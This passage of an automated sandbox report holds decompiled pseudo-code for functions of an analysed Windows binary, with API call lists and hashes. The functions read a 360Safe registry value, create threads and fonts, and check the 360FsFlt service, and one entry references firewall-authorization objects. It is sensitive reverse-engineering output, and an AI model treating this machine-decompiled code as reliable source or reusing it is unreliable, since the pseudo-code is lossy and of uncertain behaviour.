                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$CreateFromH_prolog3_catchInstanceProg
                                                                                                                                                                                          • String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
                                                                                                                                                                                          • API String ID: 3810993049-1951265404
                                                                                                                                                                                          • Opcode ID: 73c1aa2979547e872b7469a6c188500208d2b681d74c5d516fd104faf1c9d10b
                                                                                                                                                                                          • Instruction ID: c8891a28cc0acf275753f9469ea3a1a5f79a5e1f74d61e3b9639d09c884b5d41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 73c1aa2979547e872b7469a6c188500208d2b681d74c5d516fd104faf1c9d10b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B10974A00249EFCF10DFE8D888AADBBB5EF49305F2444ADE51AEB251C7359E45CB21
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CFF0D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00CFF0D0(void* __edi, void* __ebp, intOrPtr _a4) {
				signed int _v4;
				signed int _v36;
				char _v1016;
				void _v1028;
				char _v1048;
				char _v1176;
				int _v1288;
				int _v1292;
				char _v1304;
				void* __ebx;
				void* __esi;
				signed int _t27;
				int _t34;
				intOrPtr* _t35;
				void* _t36;
				char* _t37;
				char* _t38;
				int _t42;
				signed int _t43;
				void* _t47;
				CHAR* _t48;
				intOrPtr _t52;
				char _t61;
				char _t62;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				intOrPtr _t74;
				signed int _t75;
				char* _t90;

				_t68 = __edi;
				_t75 =  &_v1292;
				_t27 =  *0xd64070; // 0x8a9e1774
				_v4 = _t27 ^ _t75;
				_t74 = _a4;
				if(__edi == 0 || _t74 < 0x20) {
					L22:
					__eflags = 0;
					return E00D0071A(0, _t47, _v4 ^ _t75, _t63, _t68, _t69);
				} else {
					_v1288 = 1;
					_v1292 = 0x400;
					E00D006A0(__edi,  &_v1028, 0, 0x400);
					_t75 = _t75 + 0xc;
					_t63 =  &_v1028;
					_t34 = SHGetValueA(0x80000002, "Software\\360Safe\\Liveup", "mid",  &_v1288,  &_v1028,  &_v1292); // executed
					if(_t34 != 0) {
						goto L22;
					} else {
						_t35 =  &_v1048;
						_t63 = _t35 + 1;
						do {
							_t52 =  *_t35;
							_t35 = _t35 + 1;
						} while (_t52 != 0);
						_t36 = _t35 - _t63;
						if(_t36 != 0x40) {
							goto L22;
						} else {
							_push(_t47);
							_t64 = _t36 + 0x40;
							_push(_t69);
							_t37 =  &_v1304;
							_t71 =  &_v1048 - _t37;
							while(_t64 != 0x60) {
								_t62 =  *((intOrPtr*)(_t71 + _t37));
								if(_t62 == 0) {
									break;
								} else {
									 *_t37 = _t62;
									_t37 = _t37 + 1;
									_t64 = _t64 - 1;
									if(_t64 != 0) {
										continue;
									} else {
										L12:
										_t37 = _t37 - 1;
									}
								}
								L13:
								 *_t37 = 0;
								_t38 =  &_v1176;
								_t72 = 0x80;
								_t66 =  &_v1016 - _t38;
								while(1) {
									_t18 = _t72 + 0x7fffff7e; // 0x7ffffffe
									if(_t18 == 0) {
										break;
									}
									_t61 =  *((intOrPtr*)(_t66 + _t38));
									if(_t61 == 0) {
										break;
									} else {
										 *_t38 = _t61;
										_t38 = _t38 + 1;
										_t72 = _t72 - 1;
										if(_t72 != 0) {
											continue;
										} else {
											L19:
											_t38 = _t38 - 1;
											_t90 = _t38;
										}
									}
									L20:
									_t63 =  &_v1048;
									 *_t38 = 0;
									E00D006A0(_t68,  &_v1048, 0, 0x400);
									_t48 =  &_v1048;
									E00CFE1A0(_t48,  &_v1304, _t90, 0x400);
									_t75 = _t75 + 0x10;
									_t42 = lstrcmpiA(_t48,  &_v1176);
									_pop(_t69);
									_pop(_t47);
									if(_t42 != 0) {
										goto L22;
									} else {
										_t43 = E00C927A0(_t68, _t74,  &_v1304);
										asm("sbb eax, eax");
										return E00D0071A( ~_t43 + 1, _t47, _v36 ^ _t75,  &_v1304, _t68, _t69);
									}
									goto L23;
								}
								__eflags = _t72;
								if(_t72 == 0) {
									goto L19;
								}
								goto L20;
							}
							__eflags = _t64;
							if(_t64 == 0) {
								goto L12;
							}
							goto L13;
						}
					}
				}
				L23:
			}




































                                                                                                                                                                                          0x00cff0d0
                                                                                                                                                                                          0x00cff0d0
                                                                                                                                                                                          0x00cff0d6
                                                                                                                                                                                          0x00cff0dd
                                                                                                                                                                                          0x00cff0e5
                                                                                                                                                                                          0x00cff0ee
                                                                                                                                                                                          0x00cff24d
                                                                                                                                                                                          0x00cff257
                                                                                                                                                                                          0x00cff264
                                                                                                                                                                                          0x00cff0fd
                                                                                                                                                                                          0x00cff10c
                                                                                                                                                                                          0x00cff114
                                                                                                                                                                                          0x00cff11c
                                                                                                                                                                                          0x00cff121
                                                                                                                                                                                          0x00cff129
                                                                                                                                                                                          0x00cff145
                                                                                                                                                                                          0x00cff14d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff153
                                                                                                                                                                                          0x00cff153
                                                                                                                                                                                          0x00cff15a
                                                                                                                                                                                          0x00cff160
                                                                                                                                                                                          0x00cff160
                                                                                                                                                                                          0x00cff162
                                                                                                                                                                                          0x00cff163
                                                                                                                                                                                          0x00cff167
                                                                                                                                                                                          0x00cff16c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff172
                                                                                                                                                                                          0x00cff172
                                                                                                                                                                                          0x00cff173
                                                                                                                                                                                          0x00cff176
                                                                                                                                                                                          0x00cff177
                                                                                                                                                                                          0x00cff184
                                                                                                                                                                                          0x00cff186
                                                                                                                                                                                          0x00cff18d
                                                                                                                                                                                          0x00cff192
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff194
                                                                                                                                                                                          0x00cff194
                                                                                                                                                                                          0x00cff196
                                                                                                                                                                                          0x00cff197
                                                                                                                                                                                          0x00cff19a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff19c
                                                                                                                                                                                          0x00cff1a2
                                                                                                                                                                                          0x00cff1a2
                                                                                                                                                                                          0x00cff1a2
                                                                                                                                                                                          0x00cff19a
                                                                                                                                                                                          0x00cff1a3
                                                                                                                                                                                          0x00cff1a3
                                                                                                                                                                                          0x00cff1a6
                                                                                                                                                                                          0x00cff1b6
                                                                                                                                                                                          0x00cff1bb
                                                                                                                                                                                          0x00cff1c0
                                                                                                                                                                                          0x00cff1c0
                                                                                                                                                                                          0x00cff1c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff1ca
                                                                                                                                                                                          0x00cff1cf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff1d1
                                                                                                                                                                                          0x00cff1d1
                                                                                                                                                                                          0x00cff1d3
                                                                                                                                                                                          0x00cff1d4
                                                                                                                                                                                          0x00cff1d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff1d9
                                                                                                                                                                                          0x00cff1df
                                                                                                                                                                                          0x00cff1df
                                                                                                                                                                                          0x00cff1df
                                                                                                                                                                                          0x00cff1df
                                                                                                                                                                                          0x00cff1d7
                                                                                                                                                                                          0x00cff1e0
                                                                                                                                                                                          0x00cff1e5
                                                                                                                                                                                          0x00cff1ef
                                                                                                                                                                                          0x00cff1f2
                                                                                                                                                                                          0x00cff1fc
                                                                                                                                                                                          0x00cff207
                                                                                                                                                                                          0x00cff20c
                                                                                                                                                                                          0x00cff21a
                                                                                                                                                                                          0x00cff220
                                                                                                                                                                                          0x00cff221
                                                                                                                                                                                          0x00cff224
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff226
                                                                                                                                                                                          0x00cff22d
                                                                                                                                                                                          0x00cff234
                                                                                                                                                                                          0x00cff24c
                                                                                                                                                                                          0x00cff24c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff224
                                                                                                                                                                                          0x00cff1db
                                                                                                                                                                                          0x00cff1dd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff1dd
                                                                                                                                                                                          0x00cff19e
                                                                                                                                                                                          0x00cff1a0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00cff1a0
                                                                                                                                                                                          0x00cff16c
                                                                                                                                                                                          0x00cff14d
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFF11C
                                                                                                                                                                                          • SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 00CFF145
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CFF1F2
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(?,?,?,?,?,?,?,00000400), ref: 00CFF21A
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Valuelstrcmpi
                                                                                                                                                                                          • String ID: Software\360Safe\Liveup$mid
                                                                                                                                                                                          • API String ID: 999496690-2395435937
                                                                                                                                                                                          • Opcode ID: d0a7e5c17b8a805c5211aef2f10fde66d58c0071a6cc851f78704e3b02bbd75e
                                                                                                                                                                                          • Instruction ID: 8fe8cad2d0adf8d98cd4551ebf79354f3db6bfcf442bbe5219973840ee92a963
                                                                                                                                                                                          • Opcode Fuzzy Hash: d0a7e5c17b8a805c5211aef2f10fde66d58c0071a6cc851f78704e3b02bbd75e
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41F3715043499FE774CB24C941BFF77E8EF85704F44892CEA9987181EB706A0A8B63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00D0A6B1 Relevance: 10.6, APIs: 7, Instructions: 71threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                          			E00D0A6B1(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				char _t41;
				void* _t44;

				_t39 = __edx;
				_t41 = _a12;
				_v8 = 0;
				_t48 = _t41;
				if(_t41 != 0) {
					_push(__esi);
					E00D10B1E();
					_t44 = E00D0C48B(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E00D0092B(0, _t39, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E00D05D87(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E00D10D0C(0, __eflags) + 0x6c)));
						_push(_t44);
						E00D10BAC(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						__eflags = _t25;
						if(_t25 == 0) {
							_t25 =  &_a12;
						}
						_t20 = CreateThread(_a4, _a8, E00D0A62E, _t44, _a20, _t25); // executed
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E00D05D61(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E00D0653F(__edx, _t41, __esi);
					_t20 = 0;
				}
				return _t20;
			}












                                                                                                                                                                                          0x00d0a6b1
                                                                                                                                                                                          0x00d0a6b9
                                                                                                                                                                                          0x00d0a6be
                                                                                                                                                                                          0x00d0a6c1
                                                                                                                                                                                          0x00d0a6c3
                                                                                                                                                                                          0x00d0a6e1
                                                                                                                                                                                          0x00d0a6e2
                                                                                                                                                                                          0x00d0a6f3
                                                                                                                                                                                          0x00d0a6f7
                                                                                                                                                                                          0x00d0a6f9
                                                                                                                                                                                          0x00d0a745
                                                                                                                                                                                          0x00d0a745
                                                                                                                                                                                          0x00d0a746
                                                                                                                                                                                          0x00d0a74c
                                                                                                                                                                                          0x00d0a74f
                                                                                                                                                                                          0x00d0a754
                                                                                                                                                                                          0x00d0a759
                                                                                                                                                                                          0x00d0a75a
                                                                                                                                                                                          0x00d0a75a
                                                                                                                                                                                          0x00d0a6fb
                                                                                                                                                                                          0x00d0a700
                                                                                                                                                                                          0x00d0a703
                                                                                                                                                                                          0x00d0a704
                                                                                                                                                                                          0x00d0a70c
                                                                                                                                                                                          0x00d0a710
                                                                                                                                                                                          0x00d0a713
                                                                                                                                                                                          0x00d0a718
                                                                                                                                                                                          0x00d0a71b
                                                                                                                                                                                          0x00d0a71d
                                                                                                                                                                                          0x00d0a71f
                                                                                                                                                                                          0x00d0a71f
                                                                                                                                                                                          0x00d0a732
                                                                                                                                                                                          0x00d0a738
                                                                                                                                                                                          0x00d0a73a
                                                                                                                                                                                          0x00d0a742
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00d0a742
                                                                                                                                                                                          0x00d0a73a
                                                                                                                                                                                          0x00d0a6c5
                                                                                                                                                                                          0x00d0a6c5
                                                                                                                                                                                          0x00d0a6ca
                                                                                                                                                                                          0x00d0a6cb
                                                                                                                                                                                          0x00d0a6cc
                                                                                                                                                                                          0x00d0a6cd
                                                                                                                                                                                          0x00d0a6ce
                                                                                                                                                                                          0x00d0a6cf
                                                                                                                                                                                          0x00d0a6d5
                                                                                                                                                                                          0x00d0a6dd
                                                                                                                                                                                          0x00d0a6dd
                                                                                                                                                                                          0x00d0a760

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 00D0A6E2
                                                                                                                                                                                          • __calloc_crt.LIBCMT ref: 00D0A6EE
                                                                                                                                                                                          • __getptd.LIBCMT ref: 00D0A6FB
                                                                                                                                                                                          • __initptd.LIBCMT ref: 00D0A704
                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 00D0A732
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00D0A73C
                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00D0A754
                                                                                                                                                                                            • Part of subcall function 00D05D61: __getptd_noexit.LIBCMT ref: 00D05D61
                                                                                                                                                                                            • Part of subcall function 00D0653F: __decode_pointer.LIBCMT ref: 00D0654A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3358092440-0
                                                                                                                                                                                          • Opcode ID: 2762028ff294f5366204ba9fd89b8d73d4766f52c5a218066b82d7f79d6ce6f7
                                                                                                                                                                                          • Instruction ID: 0e85faa9dbf0e2f38a37b9eea6a24d1c50252f163fdfe174978287d4905e71c3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2762028ff294f5366204ba9fd89b8d73d4766f52c5a218066b82d7f79d6ce6f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1911C172500309BFCB10BFA8AC86A9E7BB9EF44320B144429F519961D2EB71DD419B72
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CF178B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00CF178B(void* __ebx, long __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HFONT__* _t23;
				struct HDC__* _t30;
				long _t42;
				void* _t43;
				void* _t44;

				_t44 = __eflags;
				_push(4);
				E00D0158D(0xd3817c, __ebx, __edi, __esi);
				_t42 = __ecx;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				_t30 = GetDC(0);
				if(E00CF15EE(_t30, _t42, _t44) == 0) {
					_t2 = _t42 + 0xc;
					 *_t2 =  *(_t42 + 0xc) | 0x00000100;
					__eflags =  *_t2;
				} else {
					EnumFontFamiliesW(_t30, 0, 0xcf16ee, _t42); // executed
				}
				if(( *(_t42 + 0xc) & 0x00000100) == 0x100) {
					E00C9ACCC(_t42 + 8, 0xd41e08);
				}
				if(( *(_t42 + 0xc) & 0x00000010) != 0) {
					E00C9ACCC(_t42 + 8, L"Tahoma");
				}
				if(( *(_t42 + 0xc) & 0x00000001) != 0) {
					E00C9ACCC(_t42 + 8, 0xd3e090);
				}
				ReleaseDC(0, _t30);
				_t23 = CreateFontW(0xfffffff4, 0, 0, 0, 0x190, 0, 0, 0, 0x86, 0, 0, 0, 0x20,  *(_t42 + 8)); // executed
				 *(_t42 + 4) = _t23;
				return E00D01632(_t23);
			}








                                                                                                                                                                                          0x00cf178b
                                                                                                                                                                                          0x00cf178b
                                                                                                                                                                                          0x00cf1792
                                                                                                                                                                                          0x00cf1797
                                                                                                                                                                                          0x00cf179c
                                                                                                                                                                                          0x00cf17a7
                                                                                                                                                                                          0x00cf17b0
                                                                                                                                                                                          0x00cf17c7
                                                                                                                                                                                          0x00cf17c7
                                                                                                                                                                                          0x00cf17c7
                                                                                                                                                                                          0x00cf17b2
                                                                                                                                                                                          0x00cf17ba
                                                                                                                                                                                          0x00cf17ba
                                                                                                                                                                                          0x00cf17dc
                                                                                                                                                                                          0x00cf17e6
                                                                                                                                                                                          0x00cf17e6
                                                                                                                                                                                          0x00cf17ef
                                                                                                                                                                                          0x00cf17f9
                                                                                                                                                                                          0x00cf17f9
                                                                                                                                                                                          0x00cf1802
                                                                                                                                                                                          0x00cf180c
                                                                                                                                                                                          0x00cf180c
                                                                                                                                                                                          0x00cf1813
                                                                                                                                                                                          0x00cf1833
                                                                                                                                                                                          0x00cf1839
                                                                                                                                                                                          0x00cf1841

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00CF1792
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00CF179F
                                                                                                                                                                                            • Part of subcall function 00CF15EE: _memset.LIBCMT ref: 00CF1614
                                                                                                                                                                                            • Part of subcall function 00CF15EE: GetVersionExW.KERNEL32(?), ref: 00CF1627
                                                                                                                                                                                          • EnumFontFamiliesW.GDI32(00000000,00000000,00CF16EE), ref: 00CF17BA
                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00CF1813
                                                                                                                                                                                          • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000086,00000000,00000000,00000000,00000020,?), ref: 00CF1833
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Font$CreateEnumFamiliesH_prolog3_catchReleaseVersion_memset
                                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                                          • API String ID: 3542596840-3580928618
                                                                                                                                                                                          • Opcode ID: 693f0ff8ce014bc970a511e845b3abf375fec658b9a1599956035a8a30c3b4f4
                                                                                                                                                                                          • Instruction ID: 26fd27e5ba3c2a63c193e344ad97075e9e8635265fa918b77be3bf32245594cf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 693f0ff8ce014bc970a511e845b3abf375fec658b9a1599956035a8a30c3b4f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB11E330200345BBD730AB668C4DF676EB8DBC5B10F44881CB99A862D1DAB89840D771
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEC0CF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51serviceCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 73%
                                                                                                                                                                                          			E00CEC0CF(void* __ebx, void* __eflags) {
				char _v8;
				intOrPtr _v40;
				char _v44;
				void* _t4;
				void* _t5;
				void* _t11;
				void* _t13;
				void* _t16;
				void* _t19;

				_t4 = E00CE7843(__ebx, __eflags);
				if(_t4 != 0) {
					_push(__ebx);
					_t13 = 0;
					_t16 = 0; // executed
					_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
					_t19 = _t5;
					__eflags = _t19;
					if(_t19 != 0) {
						_t16 = OpenServiceW(_t19, L"360FsFlt", 0x34);
						__eflags = _t16;
						if(_t16 != 0) {
							_t11 =  &_v44;
							__imp__QueryServiceStatusEx(_t16, 0, _t11, 0x24,  &_v8);
							__eflags = _t11;
							if(_t11 != 0) {
								__eflags = _v40 - 4;
								if(_v40 == 4) {
									_t13 = 1;
									__eflags = 1;
								}
							}
						}
					}
					CloseServiceHandle(_t19);
					CloseServiceHandle(_t16); // executed
					return _t13;
				} else {
					return _t4;
				}
			}












                                                                                                                                                                                          0x00cec0d5
                                                                                                                                                                                          0x00cec0dc
                                                                                                                                                                                          0x00cec0e0
                                                                                                                                                                                          0x00cec0e8
                                                                                                                                                                                          0x00cec0ec
                                                                                                                                                                                          0x00cec0ee
                                                                                                                                                                                          0x00cec0f4
                                                                                                                                                                                          0x00cec0f6
                                                                                                                                                                                          0x00cec0f8
                                                                                                                                                                                          0x00cec108
                                                                                                                                                                                          0x00cec10a
                                                                                                                                                                                          0x00cec10c
                                                                                                                                                                                          0x00cec114
                                                                                                                                                                                          0x00cec11a
                                                                                                                                                                                          0x00cec120
                                                                                                                                                                                          0x00cec122
                                                                                                                                                                                          0x00cec124
                                                                                                                                                                                          0x00cec128
                                                                                                                                                                                          0x00cec12a
                                                                                                                                                                                          0x00cec12a
                                                                                                                                                                                          0x00cec12a
                                                                                                                                                                                          0x00cec128
                                                                                                                                                                                          0x00cec122
                                                                                                                                                                                          0x00cec10c
                                                                                                                                                                                          0x00cec132
                                                                                                                                                                                          0x00cec135
                                                                                                                                                                                          0x00cec13d
                                                                                                                                                                                          0x00cec0df
                                                                                                                                                                                          0x00cec0df
                                                                                                                                                                                          0x00cec0df

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00CE7843: _memset.LIBCMT ref: 00CE7867
                                                                                                                                                                                            • Part of subcall function 00CE7843: _memset.LIBCMT ref: 00CE7878
                                                                                                                                                                                            • Part of subcall function 00CE7843: GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00CE788D
                                                                                                                                                                                            • Part of subcall function 00CE7843: GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00CE789E
                                                                                                                                                                                            • Part of subcall function 00CE7843: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?), ref: 00CE78AE
                                                                                                                                                                                            • Part of subcall function 00CE7843: GetProcAddress.KERNEL32(00000000), ref: 00CE78B5
                                                                                                                                                                                            • Part of subcall function 00CE7843: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?), ref: 00CE78C3
                                                                                                                                                                                          • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000001,?,761B5A40,?,?,?,?,?,00CED631,?,?,00100000,00000000), ref: 00CEC0EE
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,360FsFlt,00000034,?,?,?,?,?,00CED631,?,?,00100000,00000000), ref: 00CEC102
                                                                                                                                                                                          • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000,?,?,?,?,?,00CED631,?,?,00100000,00000000), ref: 00CEC11A
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00CED631,?,?,00100000,00000000), ref: 00CEC132
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00CED631,?,?,00100000,00000000), ref: 00CEC135
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
